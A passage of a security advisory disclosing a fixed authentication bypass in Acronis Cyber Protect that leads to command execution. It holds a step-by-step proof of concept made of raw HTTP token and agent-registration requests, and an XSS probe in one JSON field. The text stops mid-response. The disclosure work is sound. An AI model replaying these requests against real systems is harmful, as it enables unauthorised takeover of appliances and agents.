{"id":19123,"date":"2022-11-08T15:41:56","date_gmt":"2022-11-08T14:41:56","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=19123"},"modified":"2024-06-24T16:09:04","modified_gmt":"2024-06-24T14:09:04","slug":"usd-2022-0008","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2022-0008\/","title":{"rendered":"usd-2022-0008"},"content":{"rendered":"<h1>usd-2022-0008 | Authentication Bypass with subsequent Remote Command Execution in Acronis Cyber Protect<\/h1>\n<p><strong>Advisory ID<\/strong>: usd-2022-0008<br \/>\n<strong>Product<\/strong>: Acronis Cyber Protect<br \/>\n<strong>Affected Version<\/strong>: Server Version 15.0.28503<br \/>\n<strong>Vulnerability Type<\/strong>: Authentication Bypass (CWE-305)<br \/>\n<strong>Security Risk<\/strong>: Critical<br \/>\n<strong>Vendor URL<\/strong>: <a href=\"https:\/\/www.acronis.com\/en-us\/products\/cyber-protect\/\" target=\"_blank\" rel=\"noopener\">https:\/\/www.acronis.com\/en-us\/products\/cyber-protect\/<\/a><br \/>\n<strong>Vendor Status<\/strong>: Fixed<br \/>\n<strong>CVE IDs<\/strong>: CVE-2022-3405, CVE-2022-30995<br \/>\n<strong>CVE Links<\/strong>: <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2022-3405\" target=\"_blank\" rel=\"noopener\">https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2022-3405<\/a>, <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2022-30995\" target=\"_blank\" 
rel=\"noopener\">https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2022-30995<\/a><\/p>\n<h3><span style=\"color: #86cccf;\">Introduction<\/span><\/h3>\n<p>The Acronis Cyber Protect appliance, in its default configuration, allows the anonymous registration of new backup\/protection agents on new endpoints. This API endpoint also generates bearer tokens which the agent then uses to authenticate to the appliance. As the management web console is running on the same port as the API for the agents, this bearer token is also valid for any actions on the web console. This allows an attacker with network access to the appliance to start the registration of a new agent, retrieve a bearer token and then manipulate any settings on the appliance via the available functions in the web console. The web console contains multiple possibilities to execute arbitrary commands on both the agents (e.g., via PreCommands for a backup) and also the appliance (e.g., via a Validation job on the agent of the appliance). 
These options can easily be set with the provided bearer token, which leads to a complete compromise of all agents and the appliance itself.<\/p>\n<h3><span style=\"color: #86cccf;\">Proof of Concept<\/span><\/h3>\n<p>A high-privileged <strong>access_token<\/strong> can be obtained as follows:<\/p>\n<ol>\n<li>Send a <em>Token Request<\/em> using the <em>Resource Owner Password Credentials<\/em> flow (<strong>grant_type=password<\/strong>) with an empty username and password<\/li>\n<\/ol>\n<div class=\"codehilite\" style=\"background: #263238; color: #eff;\">\n<pre style=\"line-height: 125%;\"><span style=\"background: #263238;\"><\/span><span class=\"nf\" style=\"background: #263238; color: #82aaff;\">POST<\/span> <span class=\"nn\" style=\"background: #263238; color: #ffcb6b;\">\/idp\/token<\/span> <span class=\"kr\" style=\"background: #263238; color: #bb80b3;\">HTTP<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">\/<\/span><span class=\"m\" style=\"background: #263238; color: #f78c6c;\">1.1<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Host<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">172.16.164.130:9877<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">User-Agent<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">Go-http-client\/1.1<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Content-Length<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">39<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Content-Type<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: 
#c3e88d;\">application\/x-www-form-urlencoded<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Accept-Encoding<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">gzip<\/span><\/pre>\n<pre style=\"line-height: 125%;\">grant_type=password&amp;password=&amp;username=<\/pre>\n<\/div>\n<p>The IdP responds with an <strong>access_token<\/strong>, referred to below as <strong>AT1<\/strong>:<\/p>\n<div class=\"codehilite\" style=\"background: #263238; color: #eff;\">\n<pre style=\"line-height: 125%;\"><span style=\"background: #263238;\"><\/span><span class=\"kr\" style=\"background: #263238; color: #bb80b3;\">HTTP<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">\/<\/span><span class=\"m\" style=\"background: #263238; color: #f78c6c;\">1.1<\/span> <span class=\"m\" style=\"background: #263238; color: #f78c6c;\">200<\/span> <span class=\"ne\" style=\"background: #263238; color: #ffcb6b;\">OK<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Content-Length<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">2475<\/span>\n<span class=\"err\" style=\"background: #263238; color: #ff5370;\">[...]<\/span>{\"access_token\":\"eyJhbGciOiJSUzI1NiIsImVhcCI6MSwiaXJpIjoiWVV4cUV3ZXY4MmVTRXVpQkJGM1loVSIsImtpZCI6IjZjOWIx[REDACTED]\",\"token_type\":\"bearer\",\"expires_in\":86399,\"expires_on\":1644158167,\"id_token\":\"eyJhbGciOiJSUzI1NiIsImtpZCI6IjZjOWI[...]\",\"scope\":\"urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:oauth2_client_admin(backup_agent) urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:oauth2_client_admin(backup_storage) urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:agent_registrar urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:anonymous 
urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:oauth2_client_admin\"}<\/pre>\n<\/div>\n<ol start=\"2\">\n<li><strong>AT1<\/strong> can then be used to register an OAuth 2.0 client:<\/li>\n<\/ol>\n<div class=\"codehilite\" style=\"background: #263238; color: #eff;\">\n<pre style=\"line-height: 125%;\"><span style=\"background: #263238;\"><\/span><span class=\"nf\" style=\"background: #263238; color: #82aaff;\">POST<\/span> <span class=\"nn\" style=\"background: #263238; color: #ffcb6b;\">\/api\/agent_manager\/v2\/agent_registrations<\/span> <span class=\"kr\" style=\"background: #263238; color: #bb80b3;\">HTTP<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">\/<\/span><span class=\"m\" style=\"background: #263238; color: #f78c6c;\">1.1<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Host<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">172.16.164.130:9877<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Content-Length<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">1314<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Authorization<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">bearer eyJhbGciOiJSUzI1NiIsImVhcCI6MSwiaXJpIjoiW[REDACTED:AT1]<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Content-Type<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">application\/json<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Accept-Encoding<\/span><span class=\"o\" style=\"background: #263238; color: 
#89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">gzip<\/span><\/pre>\n<p>&nbsp;<\/p>\n<p><span class=\"p\" style=\"background: #263238; color: #89ddff;\">{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"id\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"51088f07-76df-4933-8382-ce8ad4c58401\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"oauth_client_secret\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"56632gryjzvcqfk2aiogwpxup4a6pgfdrdwvyiesz4l6f7lvhj44\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"hostname\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"test\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"core_version\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"current\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"release_id\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"1.15.0\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"build\"<\/span><span class=\"p\" style=\"background: 
#263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"348\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">}},<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"units\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:[{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"name\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"crs\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"version\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"current\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"release_id\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"0.0.0\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"build\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"1\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">}}},{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"name\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"sh-inventory\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: 
#ff5370;\">\"version\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"current\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"release_id\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"0.0.0\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"build\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"1\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">}}},{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"name\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"task-manager\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"version\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"current\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"release_id\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"0.0.0\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"build\"<\/span><span class=\"p\" style=\"background: #263238; color: 
#89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"1\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">}}},{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"name\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"atp-agent\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"version\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"current\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"release_id\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"0.0.0\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"build\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"1\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">}}},{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"name\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"atp-downloader\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"version\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: 
#ff5370;\">\"current\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"release_id\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"0.0.0\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"build\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"1\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">}}},{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"name\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"atp-scan-agent\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"version\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"current\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"release_id\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"0.0.0\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"build\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"1\"<\/span><span class=\"p\" style=\"background: #263238; color: 
#89ddff;\">}}},{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"name\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"active_protection\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"version\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"current\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"release_id\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"0.0.0\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"build\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"1\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">}}},{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"name\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"mms\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"version\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"current\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: 
#ff5370;\">\"release_id\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"0.0.0\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"build\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"1\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">}}},{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"name\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"sync-unit\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"version\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"current\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"release_id\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"0.0.0\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"build\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"1\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">}}},{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"name\"<\/span><span class=\"p\" style=\"background: #263238; color: 
#89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"cyber-protect-service\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"version\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"current\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"release_id\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"0.0.0\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"build\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"1\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">}}}],<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"meta\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{},<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"auto_update\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"kc\" style=\"background: #263238; color: #89ddff;\">false<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"installer_version\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"release_id\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: 
#263238; color: #c3e88d;\">\"15.0.1\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"build\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"28503\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">},<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"platform\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"family\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"WINDOWS\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"arch\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"X64\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"name\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"\\\\\"'&lt;svg\/onload=alert(1);&gt;;#--\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"version_major\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"mi\" style=\"background: #263238; color: #f78c6c;\">0<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"version_minor\"<\/span><span class=\"p\" 
style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"mi\" style=\"background: #263238; color: #f78c6c;\">0<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">},<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"zmq_agent_public_key\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"lGfb+FxD.M?1wA6Hk+@LH:RlPY4A]W)vqJ=EWX2f\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"timezone\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"+0100\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">}<\/span><span class=\"w\" style=\"background: #263238; color: #eff;\"><\/span><\/p>\n<\/div>\n<p>The above request body includes a requester-controlled \"id\" (=<strong>client_id<\/strong>) and \"oauth_client_secret\" (=<strong>client_secret<\/strong>), i.e. the client credentials are chosen by the caller rather than issued by the appliance.<\/p>\n<ol start=\"3\">\n<li>The aforementioned <strong>client_id<\/strong> and <strong>client_secret<\/strong> can then be used to perform a <em>Client Credentials Flow<\/em> (<strong>grant_type=client_credentials<\/strong>) to obtain a high-privileged <strong>access_token<\/strong> <strong>AT2<\/strong>:<\/li>\n<\/ol>\n<div class=\"codehilite\" style=\"background: #263238; color: #eff;\">\n<pre style=\"line-height: 125%;\"><span style=\"background: #263238;\"><\/span><span class=\"nf\" style=\"background: #263238; color: #82aaff;\">POST<\/span> <span class=\"nn\" style=\"background: #263238; color: #ffcb6b;\">\/idp\/token<\/span> <span class=\"kr\" style=\"background: #263238; color: #bb80b3;\">HTTP<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">\/<\/span><span class=\"m\" style=\"background: #263238; color: #f78c6c;\">1.1<\/span>\n<span class=\"na\" 
style=\"background: #263238; color: #bb80b3;\">Host<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">172.16.164.130:9877<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">User-Agent<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">Go-http-client\/1.1<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Content-Length<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">143<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Content-Type<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">application\/x-www-form-urlencoded<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Accept-Encoding<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">gzip<\/span><\/pre>\n<pre style=\"line-height: 125%;\">client_id=51088f07-76df-4933-8382-ce8ad4c58401&amp;client_secret=56632gryjzvcqfk2aiogwpxup4a6pgfdrdwvyiesz4l6f7lvhj44&amp;grant_type=client_credentials<\/pre>\n<\/div>\n<p>The IdP responds as follows:<\/p>\n<div class=\"codehilite\" style=\"background: #263238; color: #eff;\">\n<pre style=\"line-height: 125%;\"><span style=\"background: #263238;\"><\/span><span class=\"kr\" style=\"background: #263238; color: #bb80b3;\">HTTP<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">\/<\/span><span class=\"m\" style=\"background: #263238; color: #f78c6c;\">1.1<\/span> <span class=\"m\" style=\"background: #263238; color: #f78c6c;\">200<\/span> <span class=\"ne\" style=\"background: #263238; color: 
